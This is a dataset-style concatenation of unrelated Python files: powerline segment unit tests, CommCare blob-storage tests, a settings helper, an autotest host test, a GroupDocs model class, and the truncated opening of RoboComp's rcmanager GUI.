self.assertEqual(i3wm.mode(pl=pl, segment_info={'mode': 'default'}, names={'default': 'test'}), 'test')
self.assertEqual(i3wm.mode(pl=pl, segment_info={'mode': 'test'}, names={'default': 'test', 'test': 't'}), 't')
class TestMail(TestCommon):
module_name = 'mail'
def test_email_imap_alert(self):
# TODO
pass
class TestPlayers(TestCommon):
module_name = 'players'
def test_now_playing(self):
# TODO
pass
class TestBat(TestCommon):
module_name = 'bat'
def test_battery(self):
pl = Pl()
def _get_battery_status(pl):
return 86, False
with replace_attr(self.module, '_get_battery_status', _get_battery_status):
self.assertEqual(self.module.battery(pl=pl), [{
'contents': ' 86%',
'highlight_groups': ['battery_gradient', 'battery'],
'gradient_level': 14,
}])
self.assertEqual(self.module.battery(pl=pl, format='{capacity:.2f}'), [{
'contents': '0.86',
'highlight_groups': ['battery_gradient', 'battery'],
'gradient_level': 14,
}])
self.assertEqual(self.module.battery(pl=pl, steps=7), [{
'contents': ' 86%',
'highlight_groups': ['battery_gradient', 'battery'],
'gradient_level': 14,
}])
self.assertEqual(self.module.battery(pl=pl, gamify=True), [
{
'contents': ' ',
'draw_inner_divider': False,
'highlight_groups': ['battery_offline', 'battery_ac_state', 'battery_gradient', 'battery'],
'gradient_level': 0
},
{
'contents': 'OOOO',
'draw_inner_divider': False,
'highlight_groups': ['battery_full', 'battery_gradient', 'battery'],
'gradient_level': 0
},
{
'contents': 'O',
'draw_inner_divider': False,
'highlight_groups': ['battery_empty', 'battery_gradient', 'battery'],
'gradient_level': 100
}
])
self.assertEqual(self.module.battery(pl=pl, gamify=True, full_heart='+', empty_heart='-', steps='10'), [
{
'contents': ' ',
'draw_inner_divider': False,
'highlight_groups': ['battery_offline', 'battery_ac_state', 'battery_gradient', 'battery'],
'gradient_level': 0
},
{
'contents': '++++++++',
'draw_inner_divider': False,
'highlight_groups': ['battery_full', 'battery_gradient', 'battery'],
'gradient_level': 0
},
{
'contents': '--',
'draw_inner_divider': False,
'highlight_groups': ['battery_empty', 'battery_gradient', 'battery'],
'gradient_level': 100
}
])
def test_battery_with_ac_online(self):
pl = Pl()
def _get_battery_status(pl):
return 86, True
with replace_attr(self.module, '_get_battery_status', _get_battery_status):
self.assertEqual(self.module.battery(pl=pl, online='C', offline=' '), [
{
'contents': 'C 86%',
'highlight_groups': ['battery_gradient', 'battery'],
'gradient_level': 14,
}])
def test_battery_with_ac_offline(self):
pl = Pl()
def _get_battery_status(pl):
return 86, False
with replace_attr(self.module, '_get_battery_status', _get_battery_status):
self.assertEqual(self.module.battery(pl=pl, online='C', offline=' '), [
{
'contents': ' 86%',
'highlight_groups': ['battery_gradient', 'battery'],
'gradient_level': 14,
}])
class TestVim(TestCase):
def test_mode(self):
pl = Pl()
segment_info = vim_module._get_segment_info()
self.assertEqual(self.vim.mode(pl=pl, segment_info=segment_info), 'NORMAL')
self.assertEqual(self.vim.mode(pl=pl, segment_info=segment_info, override={'i': 'INS'}), 'NORMAL')
self.assertEqual(self.vim.mode(pl=pl, segment_info=segment_info, override={'n': 'NORM'}), 'NORM')
with vim_module._with('mode', 'i') as segment_info:
self.assertEqual(self.vim.mode(pl=pl, segment_info=segment_info), 'INSERT')
with vim_module._with('mode', chr(ord('V') - 0x40)) as segment_info:
self.assertEqual(self.vim.mode(pl=pl, segment_info=segment_info), 'V-BLCK')
self.assertEqual(self.vim.mode(pl=pl, segment_info=segment_info, override={'^V': 'VBLK'}), 'VBLK')
def test_visual_range(self):
pl = Pl()
vr = partial(self.vim.visual_range, pl=pl)
vim_module.current.window.cursor = [0, 0]
try:
with vim_module._with('mode', 'i') as segment_info:
self.assertEqual(vr(segment_info=segment_info), '')
with vim_module._with('mode', '^V') as segment_info:
self.assertEqual(vr(segment_info=segment_info), '1 x 1')
with vim_module._with('vpos', line=5, col=5, off=0):
self.assertEqual(vr(segment_info=segment_info), '5 x 5')
with vim_module._with('vpos', line=5, col=4, off=0):
self.assertEqual(vr(segment_info=segment_info), '5 x 4')
with vim_module._with('mode', '^S') as segment_info:
self.assertEqual(vr(segment_info=segment_info), '1 x 1')
with vim_module._with('vpos', line=5, col=5, off=0):
self.assertEqual(vr(segment_info=segment_info), '5 x 5')
with vim_module._with('vpos', line=5, col=4, off=0):
self.assertEqual(vr(segment_info=segment_info), '5 x 4')
with vim_module._with('mode', 'V') as segment_info:
self.assertEqual(vr(segment_info=segment_info), 'L:1')
with vim_module._with('vpos', line=5, col=5, off=0):
self.assertEqual(vr(segment_info=segment_info), 'L:5')
with vim_module._with('vpos', line=5, col=4, off=0):
self.assertEqual(vr(segment_info=segment_info), 'L:5')
with vim_module._with('mode', 'S') as segment_info:
self.assertEqual(vr(segment_info=segment_info), 'L:1')
with vim_module._with('vpos', line=5, col=5, off=0):
self.assertEqual(vr(segment_info=segment_info), 'L:5')
with vim_module._with('vpos', line=5, col=4, off=0):
self.assertEqual(vr(segment_info=segment_info), 'L:5')
with vim_module._with('mode', 'v') as segment_info:
self.assertEqual(vr(segment_info=segment_info), 'C:1')
with vim_module._with('vpos', line=5, col=5, off=0):
self.assertEqual(vr(segment_info=segment_info), 'L:5')
with vim_module._with('vpos', line=5, col=4, off=0):
self.assertEqual(vr(segment_info=segment_info), 'L:5')
with vim_module._with('mode', 's') as segment_info:
self.assertEqual(vr(segment_info=segment_info), 'C:1')
with vim_module._with('vpos', line=5, col=5, off=0):
self.assertEqual(vr(segment_info=segment_info), 'L:5')
with vim_module._with('vpos', line=5, col=4, off=0):
self.assertEqual(vr(segment_info=segment_info), 'L:5')
finally:
vim_module._close(1)
def test_modified_indicator(self):
pl = Pl()
segment_info = vim_module._get_segment_info()
self.assertEqual(self.vim.modified_indicator(pl=pl, segment_info=segment_info), None)
segment_info['buffer'][0] = 'abc'
try:
self.assertEqual(self.vim.modified_indicator(pl=pl, segment_info=segment_info), '+')
self.assertEqual(self.vim.modified_indicator(pl=pl, segment_info=segment_info, text='-'), '-')
finally:
vim_module._bw(segment_info['bufnr'])
def test_paste_indicator(self):
pl = Pl()
segment_info = vim_module._get_segment_info()
self.assertEqual(self.vim.paste_indicator(pl=pl, segment_info=segment_info), None)
with vim_module._with('options', paste=1):
self.assertEqual(self.vim.paste_indicator(pl=pl, segment_info=segment_info), 'PASTE')
self.assertEqual(self.vim.paste_indicator(pl=pl, segment_info=segment_info, text='P'), 'P')
def test_readonly_indicator(self):
pl = Pl()
segment_info = vim_module._get_segment_info()
self.assertEqual(self.vim.readonly_indicator(pl=pl, segment_info=segment_info), None)
with vim_module._with('bufoptions', readonly=1):
self.assertEqual(self.vim.readonly_indicator(pl=pl, segment_info=segment_info), 'RO')
self.assertEqual(self.vim.readonly_indicator(pl=pl, segment_info=segment_info, text='L'), 'L')
def test_file_scheme(self):
pl = Pl()
segment_info = vim_module._get_segment_info()
self.assertEqual(self.vim.file_scheme(pl=pl, segment_info=segment_info), None)
with vim_module._with('buffer', '/tmp/’’/abc') as segment_info:
self.assertEqual(self.vim.file_scheme(pl=pl, segment_info=segment_info), None)
with vim_module._with('buffer', 'zipfile:/tmp/abc.zip::abc/abc.vim') as segment_info:
self.assertEqual(self.vim.file_scheme(pl=pl, segment_info=segment_info), 'zipfile')
def test_file_directory(self):
pl = Pl()
segment_info = vim_module._get_segment_info()
self.assertEqual(self.vim.file_directory(pl=pl, segment_info=segment_info), None)
with replace_env('HOME', '/home/foo', os.environ):
with vim_module._with('buffer', '/tmp/’’/abc') as segment_info:
self.assertEqual(self.vim.file_directory(pl=pl, segment_info=segment_info), '/tmp/’’/')
with vim_module._with('buffer', b'/tmp/\xFF\xFF/abc') as segment_info:
self.assertEqual(self.vim.file_directory(pl=pl, segment_info=segment_info), '/tmp/<ff><ff>/')
with vim_module._with('buffer', '/tmp/abc') as segment_info:
self.assertEqual(self.vim.file_directory(pl=pl, segment_info=segment_info), '/tmp/')
os.environ['HOME'] = '/tmp'
self.assertEqual(self.vim.file_directory(pl=pl, segment_info=segment_info), '~/')
with vim_module._with('buffer', 'zipfile:/tmp/abc.zip::abc/abc.vim') as segment_info:
self.assertEqual(self.vim.file_directory(pl=pl, segment_info=segment_info, remove_scheme=False), 'zipfile:/tmp/abc.zip::abc/')
self.assertEqual(self.vim.file_directory(pl=pl, segment_info=segment_info, remove_scheme=True), '/tmp/abc.zip::abc/')
self.assertEqual(self.vim.file_directory(pl=pl, segment_info=segment_info), '/tmp/abc.zip::abc/')
os.environ['HOME'] = '/tmp'
self.assertEqual(self.vim.file_directory(pl=pl, segment_info=segment_info, remove_scheme=False), 'zipfile:/tmp/abc.zip::abc/')
self.assertEqual(self.vim.file_directory(pl=pl, segment_info=segment_info, remove_scheme=True), '/tmp/abc.zip::abc/')
self.assertEqual(self.vim.file_directory(pl=pl, segment_info=segment_info), '/tmp/abc.zip::abc/')
def test_file_name(self):
pl = Pl()
segment_info = vim_module._get_segment_info()
self.assertEqual(self.vim.file_name(pl=pl, segment_info=segment_info), None)
self.assertEqual(self.vim.file_name(pl=pl, segment_info=segment_info, display_no_file=True), [
{'contents': '[No file]', 'highlight_groups': ['file_name_no_file', 'file_name']}
])
self.assertEqual(self.vim.file_name(pl=pl, segment_info=segment_info, display_no_file=True, no_file_text='X'), [
{'contents': 'X', 'highlight_groups': ['file_name_no_file', 'file_name']}
])
with vim_module._with('buffer', '/tmp/abc') as segment_info:
self.assertEqual(self.vim.file_name(pl=pl, segment_info=segment_info), 'abc')
with vim_module._with('buffer', '/tmp/’’') as segment_info:
self.assertEqual(self.vim.file_name(pl=pl, segment_info=segment_info), '’’')
with vim_module._with('buffer', b'/tmp/\xFF\xFF') as segment_info:
self.assertEqual(self.vim.file_name(pl=pl, segment_info=segment_info), '<ff><ff>')
def test_file_size(self):
pl = Pl()
segment_info = vim_module._get_segment_info()
self.assertEqual(self.vim.file_size(pl=pl, segment_info=segment_info), '0 B')
with vim_module._with('buffer', os.path.join(os.path.dirname(__file__), 'empty')) as segment_info:
self.assertEqual(self.vim.file_size(pl=pl, segment_info=segment_info), '0 B')
def test_file_opts(self):
pl = Pl()
segment_info = vim_module._get_segment_info()
self.assertEqual(self.vim.file_format(pl=pl, segment_info=segment_info), [
{'divider_highlight_group': 'background:divider', 'contents': 'unix'}
])
self.assertEqual(self.vim.file_encoding(pl=pl, segment_info=segment_info), [
{'divider_highlight_group': 'background:divider', 'contents': 'utf-8'}
])
self.assertEqual(self.vim.file_type(pl=pl, segment_info=segment_info), None)
with vim_module._with('bufoptions', filetype='python'):
self.assertEqual(self.vim.file_type(pl=pl, segment_info=segment_info), [
{'divider_highlight_group': 'background:divider', 'contents': 'python'}
])
def test_window_title(self):
pl = Pl()
segment_info = vim_module._get_segment_info()
self.assertEqual(self.vim.window_title(pl=pl, segment_info=segment_info), None)
with vim_module._with('wvars', quickfix_title='Abc'):
self.assertEqual(self.vim.window_title(pl=pl, segment_info=segment_info), 'Abc')
def test_line_percent(self):
pl = Pl()
segment_info = vim_module._get_segment_info()
segment_info['buffer'][0:-1] = [str(i) for i in range(100)]
try:
self.assertEqual(self.vim.line_percent(pl=pl, segment_info=segment_info), '1')
vim_module._set_cursor(50, 0)
self.assertEqual(self.vim.line_percent(pl=pl, segment_info=segment_info), '50')
self.assertEqual(self.vim.line_percent(pl=pl, segment_info=segment_info, gradient=True), [
{'contents': '50', 'highlight_groups': ['line_percent_gradient', 'line_percent'], 'gradient_level': 50 * 100.0 / 101}
])
finally:
vim_module._bw(segment_info['bufnr'])
def test_line_count(self):
pl = Pl()
segment_info = vim_module._get_segment_info()
segment_info['buffer'][0:-1] = [str(i) for i in range(99)]
try:
self.assertEqual(self.vim.line_count(pl=pl, segment_info=segment_info), '100')
vim_module._set_cursor(50, 0)
self.assertEqual(self.vim.line_count(pl=pl, segment_info=segment_info), '100')
finally:
vim_module._bw(segment_info['bufnr'])
def test_position(self):
pl = Pl()
segment_info = vim_module._get_segment_info()
try:
segment_info['buffer'][0:-1] = [str(i) for i in range(99)]
vim_module._set_cursor(49, 0)
self.assertEqual(self.vim.position(pl=pl, segment_info=segment_info), '50%')
self.assertEqual(self.vim.position(pl=pl, segment_info=segment_info, gradient=True), [
{'contents': '50%', 'highlight_groups': ['position_gradient', 'position'], 'gradient_level': 50.0}
])
vim_module._set_cursor(0, 0)
self.assertEqual(self.vim.position(pl=pl, segment_info=segment_info), 'Top')
vim_module._set_cursor(97, 0)
self.assertEqual(self.vim.position(pl=pl, segment_info=segment_info, position_strings={'top': 'Comienzo', 'bottom': 'Final', 'all': 'Todo'}), 'Final')
segment_info['buffer'][0:-1] = [str(i) for i in range(2)]
vim_module._set_cursor(0, 0)
self.assertEqual(self.vim.position(pl=pl, segment_info=segment_info, position_strings={'top': 'Comienzo', 'bottom': 'Final', 'all': 'Todo'}), 'Todo')
self.assertEqual(self.vim.position(pl=pl, segment_info=segment_info, gradient=True), [
{'contents': 'All', 'highlight_groups': ['position_gradient', 'position'], 'gradient_level': 0.0}
])
finally:
vim_module._bw(segment_info['bufnr'])
def test_cursor_current(self):
pl = Pl()
segment_info = vim_module._get_segment_info()
self.assertEqual(self.vim.line_current(pl=pl, segment_info=segment_info), '1')
self.assertEqual(self.vim.col_current(pl=pl, segment_info=segment_info), '1')
self.assertEqual(self.vim.virtcol_current(pl=pl, segment_info=segment_info), [{
'highlight_groups': ['virtcol_current_gradient', 'virtcol_current', 'col_current'], 'contents': '1', 'gradient_level': 100.0 / 80,
}])
self.assertEqual(self.vim.virtcol_current(pl=pl, segment_info=segment_info, gradient=False), [{
'highlight_groups': ['virtcol_current', 'col_current'], 'contents': '1',
}])
def test_modified_buffers(self):
pl = Pl()
self.assertEqual(self.vim.modified_buffers(pl=pl), None)
def test_branch(self):
pl = Pl()
create_watcher = get_fallback_create_watcher()
branch = partial(self.vim.branch, pl=pl, create_watcher=create_watcher)
with vim_module._with('buffer', '/foo') as segment_info:
with replace_attr(self.vcs, 'guess', get_dummy_guess(status=lambda: None)):
with replace_attr(self.vcs, 'tree_status', lambda repo, pl: None):
self.assertEqual(branch(segment_info=segment_info, status_colors=False), [
{'divider_highlight_group': 'branch:divider', 'highlight_groups': ['branch'], 'contents': 'foo'}
])
self.assertEqual(branch(segment_info=segment_info, status_colors=True), [
{'divider_highlight_group': 'branch:divider', 'highlight_groups': ['branch_clean', 'branch'], 'contents': 'foo'}
])
with replace_attr(self.vcs, 'guess', get_dummy_guess(status=lambda: 'DU')):
with replace_attr(self.vcs, 'tree_status', lambda repo, pl: 'DU'):
self.assertEqual(branch(segment_info=segment_info, status_colors=False), [
{'divider_highlight_group': 'branch:divider', 'highlight_groups': ['branch'], 'contents': 'foo'}
])
self.assertEqual(branch(segment_info=segment_info, status_colors=True), [
{'divider_highlight_group': 'branch:divider', 'highlight_groups': ['branch_dirty', 'branch'], 'contents': 'foo'}
])
with replace_attr(self.vcs, 'guess', get_dummy_guess(status=lambda: 'U')):
with replace_attr(self.vcs, 'tree_status', lambda repo, pl: 'U'):
self.assertEqual(branch(segment_info=segment_info, status_colors=False, ignore_statuses=['U']), [
{'divider_highlight_group': 'branch:divider', 'highlight_groups': ['branch'], 'contents': 'foo'}
])
self.assertEqual(branch(segment_info=segment_info, status_colors=True, ignore_statuses=['DU']), [
{'divider_highlight_group': 'branch:divider', 'highlight_groups': ['branch_dirty', 'branch'], 'contents': 'foo'}
])
self.assertEqual(branch(segment_info=segment_info, status_colors=True), [
{'divider_highlight_group': 'branch:divider', 'highlight_groups': ['branch_dirty', 'branch'], 'contents': 'foo'}
])
self.assertEqual(branch(segment_info=segment_info, status_colors=True, ignore_statuses=['U']), [
{'divider_highlight_group': 'branch:divider', 'highlight_groups': ['branch_clean', 'branch'], 'contents': 'foo'}
])
def test_file_vcs_status(self):
pl = Pl()
create_watcher = get_fallback_create_watcher()
file_vcs_status = partial(self.vim.file_vcs_status, pl=pl, create_watcher=create_watcher)
with vim_module._with('buffer', '/foo') as segment_info:
with replace_attr(self.vim, 'guess', get_dummy_guess(status=lambda file: 'M')):
self.assertEqual(file_vcs_status(segment_info=segment_info), [
{'highlight_groups': ['file_vcs_status_M', 'file_vcs_status'], 'contents': 'M'}
])
with replace_attr(self.vim, 'guess', get_dummy_guess(status=lambda file: None)):
self.assertEqual(file_vcs_status(segment_info=segment_info), None)
with vim_module._with('buffer', '/bar') as segment_info:
with vim_module._with('bufoptions', buftype='nofile'):
with replace_attr(self.vim, 'guess', get_dummy_guess(status=lambda file: 'M')):
self.assertEqual(file_vcs_status(segment_info=segment_info), None)
def test_trailing_whitespace(self):
pl = Pl()
with vim_module._with('buffer', 'tws') as segment_info:
trailing_whitespace = partial(self.vim.trailing_whitespace, pl=pl, segment_info=segment_info)
self.assertEqual(trailing_whitespace(), None)
self.assertEqual(trailing_whitespace(), None)
vim_module.current.buffer[0] = ' '
self.assertEqual(trailing_whitespace(), [{
'highlight_groups': ['trailing_whitespace', 'warning'],
'contents': '1',
}])
self.assertEqual(trailing_whitespace(), [{
'highlight_groups': ['trailing_whitespace', 'warning'],
'contents': '1',
}])
vim_module.current.buffer[0] = ''
self.assertEqual(trailing_whitespace(), None)
self.assertEqual(trailing_whitespace(), None)
def test_tabnr(self):
pl = Pl()
segment_info = vim_module._get_segment_info()
self.assertEqual(self.vim.tabnr(pl=pl, segment_info=segment_info, show_current=True), '1')
self.assertEqual(self.vim.tabnr(pl=pl, segment_info=segment_info, show_current=False), None)
def test_tab(self):
pl = Pl()
segment_info = vim_module._get_segment_info()
self.assertEqual(self.vim.tab(pl=pl, segment_info=segment_info), [{
'contents': None,
'literal_contents': (0, '%1T'),
}])
self.assertEqual(self.vim.tab(pl=pl, segment_info=segment_info, end=True), [{
'contents': None,
'literal_contents': (0, '%T'),
}])
def test_bufnr(self):
pl = Pl()
segment_info = vim_module._get_segment_info()
self.assertEqual(self.vim.bufnr(pl=pl, segment_info=segment_info, show_current=True), str(segment_info['bufnr']))
self.assertEqual(self.vim.bufnr(pl=pl, segment_info=segment_info, show_current=False), None)
def test_winnr(self):
pl = Pl()
segment_info = vim_module._get_segment_info()
self.assertEqual(self.vim.winnr(pl=pl, segment_info=segment_info, show_current=True), str(segment_info['winnr']))
self.assertEqual(self.vim.winnr(pl=pl, segment_info=segment_info, show_current=False), None)
def test_segment_info(self):
pl = Pl()
with vim_module._with('tabpage'):
with vim_module._with('buffer', '1') as segment_info:
self.assertEqual(self.vim.tab_modified_indicator(pl=pl, segment_info=segment_info), None)
vim_module.current.buffer[0] = ' '
self.assertEqual(self.vim.tab_modified_indicator(pl=pl, segment_info=segment_info), [{
'contents': '+',
'highlight_groups': ['tab_modified_indicator', 'modified_indicator'],
}])
vim_module._undo()
self.assertEqual(self.vim.tab_modified_indicator(pl=pl, segment_info=segment_info), None)
old_buffer = vim_module.current.buffer
vim_module._new('2')
segment_info = vim_module._get_segment_info()
self.assertEqual(self.vim.tab_modified_indicator(pl=pl, segment_info=segment_info), None)
old_buffer[0] = ' '
self.assertEqual(self.vim.modified_indicator(pl=pl, segment_info=segment_info), None)
self.assertEqual(self.vim.tab_modified_indicator(pl=pl, segment_info=segment_info), [{
'contents': '+',
'highlight_groups': ['tab_modified_indicator', 'modified_indicator'],
}])
def test_csv_col_current(self):
pl = Pl()
segment_info = vim_module._get_segment_info()
def csv_col_current(**kwargs):
self.vim.csv_cache and self.vim.csv_cache.clear()
return self.vim.csv_col_current(pl=pl, segment_info=segment_info, **kwargs)
buffer = segment_info['buffer']
try:
self.assertEqual(csv_col_current(), None)
buffer.options['filetype'] = 'csv'
self.assertEqual(csv_col_current(), None)
buffer[:] = ['1;2;3', '4;5;6']
vim_module._set_cursor(1, 1)
self.assertEqual(csv_col_current(), [{
'contents': '1', 'highlight_groups': ['csv:column_number', 'csv']
}])
vim_module._set_cursor(2, 3)
self.assertEqual(csv_col_current(), [{
'contents': '2', 'highlight_groups': ['csv:column_number', 'csv']
}])
vim_module._set_cursor(2, 3)
self.assertEqual(csv_col_current(display_name=True), [{
'contents': '2', 'highlight_groups': ['csv:column_number', 'csv']
}, {
'contents': ' (2)', 'highlight_groups': ['csv:column_name', 'csv']
}])
buffer[:0] = ['Foo;Bar;Baz']
vim_module._set_cursor(2, 3)
self.assertEqual(csv_col_current(), [{
'contents': '2', 'highlight_groups': ['csv:column_number', 'csv']
}, {
'contents': ' (Bar)', 'highlight_groups': ['csv:column_name', 'csv']
}])
if sys.version_info < (2, 7):
raise SkipTest('csv module in Python-2.6 does not handle multiline csv files well')
buffer[len(buffer):] = ['1;"bc', 'def', 'ghi', 'jkl";3']
vim_module._set_cursor(5, 1)
self.assertEqual(csv_col_current(), [{
'contents': '2', 'highlight_groups': ['csv:column_number', 'csv']
}, {
'contents': ' (Bar)', 'highlight_groups': ['csv:column_name', 'csv']
}])
vim_module._set_cursor(7, 6)
self.assertEqual(csv_col_current(), [{
'contents': '3', 'highlight_groups': ['csv:column_number', 'csv']
}, {
'contents': ' (Baz)', 'highlight_groups': ['csv:column_name', 'csv']
}])
self.assertEqual(csv_col_current(name_format=' ({column_name:.1})'), [{
'contents': '3', 'highlight_groups': ['csv:column_number', 'csv']
}, {
'contents': ' (B)', 'highlight_groups': ['csv:column_name', 'csv']
}])
self.assertEqual(csv_col_current(display_name=True, name_format=' ({column_name:.1})'), [{
'contents': '3', 'highlight_groups': ['csv:column_number', 'csv']
}, {
'contents': ' (B)', 'highlight_groups': ['csv:column_name', 'csv']
}])
self.assertEqual(csv_col_current(display_name=False, name_format=' ({column_name:.1})'), [{
'contents': '3', 'highlight_groups': ['csv:column_number', 'csv']
}])
self.assertEqual(csv_col_current(display_name=False), [{
'contents': '3', 'highlight_groups': ['csv:column_number', 'csv']
}])
finally:
vim_module._bw(segment_info['bufnr'])
@classmethod
def setUpClass(cls):
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), 'path')))
from powerline.segments import vim
cls.vim = vim
from powerline.segments.common import vcs
cls.vcs = vcs
@classmethod
def tearDownClass(cls):
sys.path.pop(0)
class TestPDB(TestCase):
def test_current_line(self):
pl = Pl()
self.assertEqual(pdb.current_line(pl=pl, segment_info={'curframe': Args(f_lineno=10)}), '10')
def test_current_file(self):
pl = Pl()
cf = lambda **kwargs: pdb.current_file(
pl=pl,
segment_info={'curframe': Args(f_code=Args(co_filename='/tmp/abc.py'))},
**kwargs
)
self.assertEqual(cf(), 'abc.py')
self.assertEqual(cf(basename=True), 'abc.py')
self.assertEqual(cf(basename=False), '/tmp/abc.py')
def test_current_code_name(self):
pl = Pl()
ccn = lambda **kwargs: pdb.current_code_name(
pl=pl,
segment_info={'curframe': Args(f_code=Args(co_name='<module>'))},
**kwargs
)
self.assertEqual(ccn(), '<module>')
def test_current_context(self):
pl = Pl()
cc = lambda **kwargs: pdb.current_context(
pl=pl,
segment_info={'curframe': Args(f_code=Args(co_name='<module>', co_filename='/tmp/abc.py'))},
**kwargs
)
self.assertEqual(cc(), 'abc.py')
def test_stack_depth(self):
pl = Pl()
sd = lambda **kwargs: pdb.stack_depth(
pl=pl,
segment_info={'pdb': Args(stack=[1, 2, 3]), 'initial_stack_length': 1},
**kwargs
)
self.assertEqual(sd(), '2')
self.assertEqual(sd(full_stack=False), '2')
self.assertEqual(sd(full_stack=True), '3')
old_cwd = None
def setUpModule():
global old_cwd
global __file__
old_cwd = os.getcwd()
__file__ = os.path.abspath(__file__)
os.chdir(os.path.dirname(__file__))
def tearDownModule():
global old_cwd
os.chdir(old_cwd)
if __name__ == '__main__':
from tests import main
main()
| lukw00/powerline | tests/test_segments.py | Python | mit | 75,312 |
from unittest import TestCase
from StringIO import StringIO
from corehq.blobs.atomic import AtomicBlobs
from corehq.blobs.exceptions import InvalidContext, NotFound
from corehq.blobs.tests.util import TemporaryFilesystemBlobDB
class TestFilesystemBlobDB(TestCase):
@classmethod
def setUpClass(cls):
cls.db = TemporaryFilesystemBlobDB()
@classmethod
def tearDownClass(cls):
cls.db.close()
def test_put(self):
with AtomicBlobs(self.db) as db:
info = db.put(StringIO(b"content"))
with self.db.get(info.identifier) as fh:
self.assertEqual(fh.read(), b"content")
def test_put_failed(self):
with self.assertRaises(Boom), AtomicBlobs(self.db) as db:
info = db.put(StringIO(b"content"))
raise Boom()
with self.assertRaises(NotFound):
self.db.get(info.identifier)
def test_put_outside_context(self):
with AtomicBlobs(self.db) as db:
pass
with self.assertRaises(InvalidContext):
db.put(StringIO(b"content"))
def test_delete(self):
info = self.db.put(StringIO(b"content"))
with AtomicBlobs(self.db) as db:
db.delete(info.identifier)
with self.assertRaises(NotFound):
self.db.get(info.identifier)
def test_delete_failed(self):
info = self.db.put(StringIO(b"content"))
with self.assertRaises(Boom), AtomicBlobs(self.db) as db:
db.delete(info.identifier)
raise Boom()
with self.db.get(info.identifier) as fh:
self.assertEqual(fh.read(), b"content")
def test_delete_outside_context(self):
with AtomicBlobs(self.db) as db:
pass
with self.assertRaises(InvalidContext):
db.delete(StringIO(b"content"))
class Boom(Exception):
pass
| qedsoftware/commcare-hq | corehq/blobs/tests/test_atomic.py | Python | bsd-3-clause | 1,865 |
import csv
import json
class UserSettings(object):
@staticmethod
def save_settings(new_settings):
f = open('settings.csv', "wb")
w = csv.writer(f)
for key, val in new_settings.items():
w.writerow([key, val])
f.close()
@staticmethod
def read_settings():
f = open('settings.csv', 'rb')
settings_dict = {}
for key, val in csv.reader(f):
settings_dict[key] = val
f.close()
return settings_dict
@staticmethod
def read_json_settings(key=""):
try:
file_vals = json.load(open('settings.json', 'r'))
if not key:
return file_vals
if file_vals[key]:
return file_vals[key]
return file_vals
except (IOError, KeyError) as err:
print('Error while reading json file data:',err)
return {}
@staticmethod
def save_json_settings(settings, key):
file_vals = UserSettings.read_json_settings()
if (not file_vals):
file_vals = {}
file_vals[key] = settings
res = json.dump(file_vals, open("settings.json", "w"))
return res
| valuko/team_st33ve | settings.py | Python | mit | 1,207 |
#!/usr/bin/python
import unittest
import common
from autotest_lib.client.common_lib import error, utils
from autotest_lib.client.common_lib.test_utils import mock
from autotest_lib.client.common_lib.hosts import base_classes
class test_host_class(unittest.TestCase):
def setUp(self):
self.god = mock.mock_god()
def tearDown(self):
self.god.unstub_all()
def test_run_output_notimplemented(self):
host = base_classes.Host()
self.assertRaises(NotImplementedError, host.run_output, "fake command")
def test_check_diskspace(self):
self.god.stub_function(base_classes.Host, 'run')
host = base_classes.Host()
host.hostname = 'unittest-host'
test_df_tail = ('/dev/sda1 1061 939'
' 123 89% /')
fake_cmd_status = utils.CmdResult(exit_status=0, stdout=test_df_tail)
host.run.expect_call('df -PB 1000000 /foo | tail -1').and_return(
fake_cmd_status)
self.assertRaises(error.AutoservDiskFullHostError,
host.check_diskspace, '/foo', 0.2)
host.run.expect_call('df -PB 1000000 /foo | tail -1').and_return(
fake_cmd_status)
host.check_diskspace('/foo', 0.1)
self.god.check_playback()
if __name__ == "__main__":
unittest.main()
| wuzhy/autotest | client/common_lib/hosts/base_classes_unittest.py | Python | gpl-2.0 | 1,372 |
#!/usr/bin/env python
"""
Copyright 2012 GroupDocs.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
class TemplateFieldsResponse:
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually."""
def __init__(self):
self.swaggerTypes = {
'result': 'TemplateFieldsResult',
'status': 'str',
'error_message': 'str',
'composedOn': 'int'
}
self.result = None # TemplateFieldsResult
self.status = None # str
self.error_message = None # str
self.composedOn = None # int
| liosha2007/temporary-groupdocs-python3-sdk | groupdocs/models/TemplateFieldsResponse.py | Python | apache-2.0 | 1,158 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# -----------------------
# ----- rcmanager -----
# -----------------------
# An ICE component manager.
#
# Copyright (C) 2009-2015 by RoboLab - University of Extremadura
#
# This file is part of RoboComp
#
# RoboComp is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# RoboComp is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with RoboComp. If not, see <http://www.gnu.org/licenses/>.
#
#
#
# CODE BEGINS
#
import argparse
import sys, time, traceback, os, math, random, threading, time
import Ice
from PySide2 import QtCore, QtGui, QtWidgets
from ui_formManagerSimple import Ui_Form
import rcmanagerConfigSimple
global_ic = Ice.initialize(sys.argv)
# Ctrl+c handling
import signal
signal.signal(signal.SIGINT, signal.SIG_DFL)
dict = rcmanagerConfigSimple.getDefaultValues()
initDir = os.getcwd()
sys.path.append('.')
sys.path.append('/opt/robocomp/bin')
import rcmanagerEditorSimple
# CommandDialog class: It's the dialog sending "up()/down() component X signal to the main
class CommandDialog(QtWidgets.QWidget):
up = QtCore.Signal()
down = QtCore.Signal()
restart = QtCore.Signal()
config = QtCore.Signal()
def __init__(self, parent, x, y):
QtWidgets.QWidget.__init__(self)
self.setParent(parent)
self.setGeometry(x, y, 100, 75)
self.button1 = QtWidgets.QPushButton(self)
self.button1.setGeometry(0, 0, 100, 25)
self.button1.setText('up')
self.button2 = QtWidgets.QPushButton(self)
self.button2.setGeometry(0, 25, 100, 25)
self.button2.setText('down')
self.button3 = QtWidgets.QPushButton(self)
self.button3.setGeometry(0, 50, 100, 25)
self.button3.setText("restart")
self.button4 = QtWidgets.QPushButton(self)
self.button4.setGeometry(0, 75, 100, 25)
